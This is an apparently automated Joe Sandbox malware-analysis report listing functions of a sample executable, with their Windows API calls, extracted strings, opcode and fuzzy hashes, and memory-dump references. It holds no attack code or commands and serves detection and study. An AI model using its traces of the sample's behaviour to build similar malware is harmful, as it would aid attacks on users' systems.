                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$_sprintf_strlen
                                                                                                                                                    • String ID: %02X
                                                                                                                                                    • API String ID: 1921645428-436463671
                                                                                                                                                    • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                    • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                                                                                    • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                                                                                    • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                                                                                    Function 00451006 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: Combobox
                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                    • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                    • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                                                                                    • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                                                                                    • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                                                                                    Function 00451321 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                                    • String ID: edit
                                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                                    • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                    • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                                                                                    • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                                                                                    • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                                                                                    Function 00476CA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                    • String ID: @
                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                    • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                    • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                                                                                    • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                                                                                    • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                                                                                    Function 00465225 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: htonsinet_addr
                                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                                    • API String ID: 3832099526-2422070025
                                                                                                                                                    • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                    • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                                                                                    • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                                                                                    • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                                                                                    Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InternetOpen
                                                                                                                                                    • String ID: <local>
                                                                                                                                                    • API String ID: 2038078732-4266983199
                                                                                                                                                    • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                    • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                                                                                    • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                                                                                    • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                                                                                    Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock_memmove
                                                                                                                                                    • String ID: EA06
                                                                                                                                                    • API String ID: 1988441806-3962188686
                                                                                                                                                    • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                                                    • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                                                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                                                    Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove
                                                                                                                                                    • String ID: u,D
                                                                                                                                                    • API String ID: 4104443479-3858472334
                                                                                                                                                    • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                                    • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                                                                                    • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                                                                                    • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                                                                                    Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • _memmove.LIBCMT ref: 00401B57
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                                                                                                                    • String ID: @EXITCODE
                                                                                                                                                    • API String ID: 2734553683-3436989551
                                                                                                                                                    • Opcode ID: 4236665bcc639584f04fcdb9ba1468009aa28956b7e53f741a3b1c0e70b2e800
                                                                                                                                                    • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                                                                                                                                    • Opcode Fuzzy Hash: 4236665bcc639584f04fcdb9ba1468009aa28956b7e53f741a3b1c0e70b2e800
                                                                                                                                                    • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                                                                                                                                    Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • wsprintfW.USER32 ref: 0045612A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend_mallocwsprintf
                                                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                                                    • API String ID: 1262938277-328681919
                                                                                                                                                    • Opcode ID: 176057d1547a49c229b5c6d08b1f9f4639a001779c71fa0498bff8c6852dc9fc
                                                                                                                                                    • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                                                                                    • Opcode Fuzzy Hash: 176057d1547a49c229b5c6d08b1f9f4639a001779c71fa0498bff8c6852dc9fc
                                                                                                                                                    • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                                                    Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                                                    • InternetCloseHandle.WININET ref: 00442668
                                                                                                                                                      • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                                                    • String ID: aeB
                                                                                                                                                    • API String ID: 857135153-906807131
                                                                                                                                                    • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                    • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                                                    • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                                                    • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                                                    Function 00433244 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsncpy
                                                                                                                                                    • String ID: ^B$C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                    • API String ID: 1735881322-548649498
                                                                                                                                                    • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                                                    • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                                                                                                    • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                                                    • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                                                                                                    Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                                    • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                    • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                                                    • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                                                    • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                                                    Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                                                      • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
